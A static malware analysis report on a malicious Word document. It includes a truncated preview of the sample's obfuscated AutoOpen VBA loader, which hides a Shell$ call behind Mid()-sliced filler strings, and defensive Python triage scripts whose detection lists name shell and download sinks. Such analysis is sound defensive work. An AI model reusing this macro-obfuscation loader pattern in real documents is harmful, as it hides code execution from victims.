Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b42017e56fdb7e53…

Verdict: MALICIOUS
Type: Office (OLE)
Size: 128.5 KB
Created: 2017-11-21 05:20:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: e660940388357227c8089d4e92cccd01
SHA-1: f1be1b17f6ab3954a576a96d9f9b43ae2b2064e0
SHA-256: b42017e56fdb7e53bdf662d325d8ea44d68094c45a842d051b7bee70ca098a12
Risk Score: 304

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter: T1059.005 Visual Basic

The sample is a Word document (OLE) carrying obfuscated VBA macros. The AutoOpen macro runs when the document is opened with macros enabled and passes the return value of a helper function to Shell$ (Shell$ SKGtwwOPi, 0; window style 0 is vbHide, so the spawned process is hidden). The helper assembles its string from Mid() slices of long alphanumeric filler strings, interleaved with dummy Array() assignments, so neither the command line nor any URL appears as a literal in the source. The same auto-execution and execution tokens are also present in the compiled p-code stream, so the loader shape remains detectable when source extraction fails. The primary indicator beyond the document hashes is the extracted VBA module (macros.bas, SHA-256 listed under Extracted artifacts); the command it ultimately executes is not recovered in the truncated preview.

Heuristics (9)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The AutoOpen macro calls Shell$ on the return value of a function (Shell$ SKGtwwOPi, 0). The window-style argument 0 is vbHide, so the child process runs without a visible window.
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder takes Mid() slices of long alphanumeric filler strings, padded with dummy Array() assignments that are never read.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The module defines Sub AutoOpen(), which Word executes on document open once macros are enabled.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Its description does not match this sample: a VBA project was recovered (macros.bas below), so treat the hit as redundant with OLE_VBA_AUTOOPEN rather than as a second execution surface.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body). This is the DrawingML XML namespace URI carried by any document with drawing content; it is not a contacted host and should not be treated as a network indicator.
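The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC rules describe a source-level loader shape and a stream-level fallback for when source cannot be recovered. The following is an added example of how an analyst can reproduce both checks over an extracted module and over a raw stream; it is not the analysis platform's own rule engine. The token lists, regexes, the three-junk-array threshold, and the constructed module (in which calc.exe stands in for the command this sample does not reveal in the truncated preview) are all assumptions.

```python
"""Static triage of an extracted VBA module, modelled on the heuristics above.

Added example, not the analysis platform's own rule engine: token lists,
regexes, thresholds and the constructed inputs are assumptions.
"""
import re
from typing import Dict, List, Optional, Tuple

# Macro auto-execution entry points and execution / object-instantiation sinks.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Document_Close", "Workbook_Open", "Auto_Open", "Auto_Close")
SINK_TOKENS = ("Shell", "CreateObject", "GetObject", "ShellExecute",
               "URLDownloadToFile", "WScript.Shell", "XMLHTTP", "ADODB.Stream")

# Shapes of the string-reconstruction decoders named in the heuristic.
RE_JUNK_ARRAY = re.compile(r'^\s*\w+\s*=\s*Array\(\s*"[^"\n]*"(?:\s*,\s*"[^"\n]*")*\s*\)\s*$', re.M)
RE_LITERAL = re.compile(r'^\s*(\w+)\s*=\s*"([^"\n]*)"\s*$', re.M)
RE_MID = re.compile(r'\bMid\$?\(\s*(\w+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.I)
RE_CHR_CHAIN = re.compile(r'Chr[W$]?\(\s*\d+\s*\)(?:\s*&\s*Chr[W$]?\(\s*\d+\s*\)){3,}', re.I)
RE_REPLACE_JUNK = re.compile(r'\bReplace\(\s*[^,]+,\s*"[^"]+"\s*,\s*""\s*\)', re.I)
RE_SHELL_ARG = re.compile(r'^\s*(?:Call\s+)?Shell\$?\s*\(?\s*([A-Za-z_]\w*)', re.M | re.I)
RE_FUNC = re.compile(r'^\s*(?:Public\s+|Private\s+)?Function\s+(\w+)', re.M | re.I)


def _token_re(tok: str) -> "re.Pattern[str]":
    # Whole-word match that also accepts the type-suffixed form (Shell$).
    return re.compile(r"(?<![\w.])" + re.escape(tok) + r"\$?(?!\w)", re.I)


def resolve_mid_slices(src: str) -> List[Tuple[str, str]]:
    """Evaluate Mid(var, start, len) statically when var is assigned exactly one
    string literal in the module. VBA Mid is 1-based."""
    literals: Dict[str, Optional[str]] = {}
    for name, value in RE_LITERAL.findall(src):
        literals[name] = None if name in literals else value   # ambiguous if reassigned
    slices = []
    for name, start, length in RE_MID.findall(src):
        lit = literals.get(name)
        if lit is not None and int(start) >= 1:
            s = int(start) - 1
            slices.append((name, lit[s:s + int(length)]))
    return slices


def triage_vba(src: str) -> Dict[str, object]:
    autoexec = [t for t in AUTOEXEC_TOKENS if _token_re(t).search(src)]
    sinks = [t for t in SINK_TOKENS if _token_re(t).search(src)]
    functions = {f.lower() for f in RE_FUNC.findall(src)}
    # Shell$ applied to a function's return value: the command never appears as a literal.
    shell_arg_is_function = any(a.lower() in functions for a in RE_SHELL_ARG.findall(src))
    junk_arrays = len(RE_JUNK_ARRAY.findall(src))
    decoder_shapes = {
        "mid_slicing": bool(RE_MID.search(src)),
        "chr_chain": bool(RE_CHR_CHAIN.search(src)),
        "replace_junk": bool(RE_REPLACE_JUNK.search(src)),
        "junk_arrays": junk_arrays >= 3,   # assumed threshold
    }
    rules = []
    if "AutoOpen" in autoexec:
        rules.append("OLE_VBA_AUTOOPEN")
    if "Shell" in sinks:
        rules.append("OLE_VBA_SHELL")
    if autoexec and sinks and (shell_arg_is_function or any(decoder_shapes.values())):
        rules.append("OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER")
    return {"autoexec": autoexec, "sinks": sinks, "shell_arg_is_function": shell_arg_is_function,
            "junk_arrays": junk_arrays, "mid_slices": resolve_mid_slices(src),
            "decoder_shapes": decoder_shapes, "rules": rules}


def scan_stream_tokens(data: bytes) -> Dict[str, List[str]]:
    """Fallback for p-code-only documents: search a compiled/cache VBA stream for the
    same tokens in both 8-bit and UTF-16LE form, case-insensitively."""
    low = data.lower()   # bytes.lower() only touches ASCII letters, so wide strings survive

    def present(tok: str) -> bool:
        t = tok.lower()
        return t.encode("ascii") in low or t.encode("utf-16-le") in low

    found = {"autoexec": [t for t in AUTOEXEC_TOKENS if present(t)],
             "exec": [t for t in SINK_TOKENS if present(t)]}
    found["rule"] = ["OLE_VBA_PCODE_AUTOEXEC_EXEC"] if found["autoexec"] and found["exec"] else []
    return found


# Constructed module in the shape of the preview below (not the sample's real strings;
# calc.exe is an assumed stand-in for the command the sample builds).
SAMPLE_MODULE = '''Attribute VB_Name = "Module1"
Sub AutoOpen()
junk1 = Array("EPcMbUoc", "BCXcijsf", "FZJbzCXj")
Shell$ BuildCmd, 0
junk2 = Array("KCBziHqN", "mjlCCiGA", "dnWOUwJN")
End Sub
Function BuildCmd()
filler = "i0b0oFtCIncalc.exeZEBjpVtPQrf"
part1 = Mid(filler, 11, 8)
junk3 = Array("mbSIXMHV", "FzOwrQFJ", "vvuQLJZl")
BuildCmd = part1
End Function
'''
# Constructed stand-in for a compiled stream: wide-string AutoOpen, narrow Shell.
SAMPLE_STREAM = b"\x00\x12" + "AutoOpen".encode("utf-16-le") + b"\x00\x00\x07Shell\x00"

if __name__ == "__main__":
    print(triage_vba(SAMPLE_MODULE))
    print(scan_stream_tokens(SAMPLE_STREAM))
```

The resolved Mid() slices are the useful output for a report: they recover fragments of the command without executing the macro, and a slice that resolves to nothing readable (as in the truncated preview above, where the visible slices are still filler) tells the analyst that the real assembly happens further down and the module needs to be read in full or emulated.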

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 137053 bytes
SHA-256: 12e42775cdc437ce97d903bdd78843cbf0dd8f81079a5d95d846762ef5a80272
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 80 long base64-like blob(s). "Base64-like" is a character-class match; the long strings visible in the preview are alphanumeric filler consumed by Mid(), not decoded payloads, so the count supports the obfuscation finding rather than indicating embedded binaries.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JNLpJdWja"
Sub AutoOpen()
ssiskJaol = Array("EPcMbUoc", "BCXcijsf", "FZJbzCXj", "ZTQQjzWV", "QrzjQRKC")
NwrQNGKIm = Array("NijRNlCs", "wmIEXtCj", "BLqkLPnP", "HNBKHTSJ", "HiWUmECG")
woUiBwqFp = Array("kLvTYazr", "UKAjrlcT", "wwsWhtzI", "knXvINJW", "wVXIXpjE")
Shell$ SKGtwwOPi, 0
YdSuCWEDr = Array("KCBziHqN", "mjlCCiGA", "dnWOUwJN", "owEbDGNi", "UDzLHZON")
julGzBVvM = Array("tYjioXOt", "oIjDPKfW", "CizkvtEZ", "JhaKCPmd", "JOJiizfj")
jRSQiJRjG = Array("kuTWKRzT", "JZHwEqZW", "GuABwrDC", "SBdanuzQ", "qDSUSHwz")
End Sub
Function SKGtwwOPi()
qZjllWbH = "i0b0oFtCIn0F9BKltNmhTawDWiUbNKDhSYVbjfohfmlcJHRcwSJZiJbQwbFCXWZACtfNNiENZEBjpVtPQrfvBiDJzEfFZlJJNlaQbEPSNvzZHubbiqljqdwXpVQIwzonusTEucnMcNhFfdCCdDWiAdSjmDbGnGTOHMiPaWjFDZDdwtsLTNivcFnRakRrBjYz5"
wwlwoZYChm = Mid(qZjllWbH, 16, 176)
SINSRvZsDL = Array("mbSIXMHV", "FzOwrQFJ", "vvuQLJZl", "pUREwMjR", "jhcbbVaa")
rrqnmNIzt = Array("KkRjSUwd", "ThDwSLNc", "BhTCuDWt", "QwQKoiha", "UTFasqSU")
FbwpJzciZ = "tNC2Z1jkosvqpjwKnHAUGmPsoYinGQUKPiIJsYlRHIqiLBYQJRkhhnVXJfhhZbiXYkaLYntOTTbD9ANdibaWDX2fPJiiMs9Sm0VIKj"
pRMwWaKBHE = Mid(FbwpJzciZ, 8, 63)
iDtOPVzl = Array("wwpoEnYw", "nwMUXwRi", "zvRiIzOi", "POfCsapJ", "lnXHwAlM")
UOjavKOE = Array("FfLHZPoS", "hwGWnHXw", "hGZpHVDN", "ICikYJkz", "KEYcoGIz")
AiLbCtm = "w61J8bjPnIXZPhOZsjXQYzdQmhkAFkwJmmiBrWahaTvmajmYPDqDwcNYlaRBPjKCMNmczNiVGpqECrpGvOrt37ccpbhKswot5M4kZ"
bXfcPUmLifU = Mid(AiLbCtm, 7, 75)
OdBFEbZ = Array("hEUzjsYP", "AoApHlTW", "TwiMGmvT", "OztAfJkU", "EIpcjtpU")
iqUXA = Array("jwiuvUSM", "GtbDYhju", "IBljzXjq", "EflwvrnZ", "HOdJDBYt")
lPkDIbV = "7jGwRSOViMzvljnAOiojndcJkzMrDrjiTFaaNrVwWLwaXcYwuhLwprlHwBnoFXSrfTcfGMmWIqJbiBlIaOwVjjpbUScLEhtztHuEAtsiuoozhJdwPfNrawKwiBKnjbRawKhXGhHhVObrvqtKpfvZUBYwwwZzi2sOmPJB"
wTfomdREFJz = Mid(lPkDIbV, 6, 151)
qbdPX = Array("kOZAXEQB", "sQvLKIKN", "PijflkSw", "DMFRECiQ", "jTfUtQsB")
QrDIlbQOF = Array("muRnijwU", "jnDwQdlz", "vbzKzzwq", "ifbrcqUw", "lftqTfUW")
oiDYYXjPNW = "TwshpVbiSDrjYpkhFEmSmUjQbltCLfdQkUwLQFSZoARJHiQJSCiTWFAOHbGEbYWnabzEsZQAmNilDaJsUjjIwKtiTiDpwOwPdijjiLRslhjJbOLhSOjrpOqPhUlJWbCYOOHZrdJJSqWOdjDEXVXkiGaPnTwNaHWKfIuMHmpoEaZwrblzRjmAdc3j3szXZzuHH"
CCzwUOb = Mid(oiDYYXjPNW, 3, 178)
GkfoEt = Array("iWJwRBfE", "iGssZVSL", "stzvXPUn", "AILsnlWT", "kHUivvZR")
vvTKKRYwn = Array("ZIGiCnql", "IiXWhvaP", "BWvJpmQs", "jYHSAjQw", "TjWOJqkM")
dGMzd = "VUaAj9r8THQjMkBusLKZKPQEYRtJsaMtJZCUUzImIWulLGDwIITCcDozSRiXzvJQcMmnijZvCYQnVftROzAkGKQFkFCDOkpNMdIwUPOciYzEnBbnXQJzuZKSwjDciWjRiCbsWuzwiYBiKMSjiOfwbpSmTqCnMlwMriV1Fcz"
vYEjRPCYK = Mid(dGMzd, 13, 151)
FTsJOBpiEr = Array("mRlvBrwC", "EjWwwGfs", "oLnozlQV", "zXmQYLkj", "jLqPmpXa")
rINHL = Array("dAzpoINf", "DzbpYplB", "BQviEfis", "wqMkQQFz", "oMKznajq")
kkPma = "D7B7FOokBjjnpSSdbHvzaiMjiHSMktLMpaTzzSwBRjCQmdCmqoYLUPdATAKwwbAHYUwOzUjIJuhrjvtFEfWwUzrZzSiwHzEqiusSionVIPCZimUXHFuQEEnYcZRjpjAKqrIlDaaPsAnFzSrKwHoCEoliHUqFXGfYOsjqdiUjifYDQhbJiGiiuwFBFddjkVslVPqEjAtOww09oln0w81HH7RfuZisA3uwtdi"
wORifBLJOCQ = Mid(kkPma, 5, 194)
kQBNa = Array("jTLaCjFv", "rMbijivh", "sajItvOl", "bnnoYYfQ", "zmOcRokJ")
mdtYm = Array("VFUSNirA", "KnEsYwKn", "EazOvRWS", "hKlwTSPE", "pWmobwXw")
rqMNMHhnz = "V6iEwTWNCXcFqiXfVLVSBnHzwEfsGulkaIHIzRPHVhnVikpNCojNbiwlriGuniHHlrihaOjEwNzUzlROOSqROYJwLVRQKVUrZjkrFInnIbQOhclFRsfUnqsMhhVEwPtbtFuTBZIGfCJnHuPjjMzSpzDjoXJXmirOnjiRo4DvzfMMzSuErD0bv1LahXAj1QRY"
ziKRS = Mid(rqMNMHhnz, 3, 157)
jhnvVszNlGs = Array("SlTsuXPS", "IiFYLUCB", "GmNUjqnG", "PPolDFRz", "EplIbozz")
bpvmAi = Array("jktcQnzh", "ARCAXcLb", "zMdiiiOC", "RIUVjuaS", "pOlzwLqc")
zqwbGO = "Z6rUtYrzrMcY8YfU1Z"
LKKMhjwV = Mid(zqwbGO, 5, 8)
WkjdL = Array("htrajLHW", "zjdEzjJq", "IiwRFRjR", "dXsJGpLt", "qKZZjXWf")
jkGJJiJQGY = Array("dpLLjann", "rVTPjivQ", "JazMTzPH", "UkOpJkHk", "HQoQFYiC")
cvOCrjQO = "YfdhLuqFhuui543AE8D4Idk5qN3AR9kZiRdT
... (truncated)
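The "80 long base64-like blob(s)" figure in the artifact triage is a character-class match, and in the preview above the long alphanumeric strings are Mid() sources rather than encoded payloads. The following is an added example, not the platform's own check, of separating such filler from blobs that genuinely decode to text or to a known container. The thresholds, verdict labels, and the constructed module (with example.invalid as the decoded URL and a byte-range blob as the binary case) are assumptions.

```python
"""Triage of base64-like string blobs in an extracted VBA module.

Added example, not the platform's own check: thresholds, labels and the
constructed module are assumptions.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

RE_BLOB = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')            # quoted base64-alphabet runs
RE_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"\n]*)"\s*$', re.M)  # var = "literal"
RE_MID_SRC = re.compile(r'\bMid\$?\(\s*(\w+)\s*,', re.I)           # Mid(var, ...


def try_decode(blob: str) -> Optional[bytes]:
    """Strict decode after re-padding; None when the run is not valid base64
    (for example a length of 1 mod 4, which no real encoder produces)."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def classify_blobs(src: str) -> List[Dict[str, object]]:
    mid_sources = {v.lower() for v in RE_MID_SRC.findall(src)}
    owner = {lit: var for var, lit in RE_ASSIGN.findall(src)}   # literal -> variable
    out = []
    for blob in RE_BLOB.findall(src):
        var = owner.get(blob)
        decoded = try_decode(blob)
        used_by_mid = var is not None and var.lower() in mid_sources
        if used_by_mid:
            verdict = "mid_filler"          # character array for a slicing decoder
        elif decoded is None:
            verdict = "opaque"              # not decodable: random filler
        elif decoded[:2] == b"MZ" or decoded[:4] == b"PK\x03\x04":
            verdict = "base64_container"    # embedded PE or ZIP/OOXML
        elif printable_ratio(decoded) >= 0.9:   # assumed threshold
            verdict = "base64_text"         # command line, URL, script
        else:
            verdict = "opaque"              # decodes, but only to high-entropy junk
        preview = decoded.decode("ascii", "replace")[:64] if verdict == "base64_text" else ""
        out.append({"var": var, "length": len(blob), "decodes": decoded is not None,
                    "used_as_mid_source": used_by_mid, "verdict": verdict,
                    "decoded_preview": preview})
    return out


# Constructed module: two filler strings in the shape of the preview above, one real
# base64 URL (example.invalid is a reserved name) and one base64 binary blob.
PAYLOAD_B64 = base64.b64encode(b"http://example.invalid/stage2.bin").decode()
BINARY_B64 = base64.b64encode(bytes(range(48))).decode()
SAMPLE = (
    "Sub Demo()\n"
    'filler = "i0b0oFtCIn0F9BKltNmhTawDWiUbNKDhSYVbjfohfmlcJHRcwSJZiJbQwbFCXWZ"\n'
    "piece = Mid(filler, 16, 20)\n"
    f'payload = "{PAYLOAD_B64}"\n'
    f'blob = "{BINARY_B64}"\n'
    'noise = "VUaAj9r8THQjMkBusLKZKPQEYRtJsaMtJZCUUzImIWulLGDwIITCcDozSRiXz"\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for entry in classify_blobs(SAMPLE):
        print(entry)
```

A blob that decodes is not by itself evidence of a payload: any alphanumeric run whose length is 0, 2 or 3 mod 4 decodes to some bytes. The discriminators that matter are how the variable is consumed in the macro and whether the decoded bytes look like text or a known container.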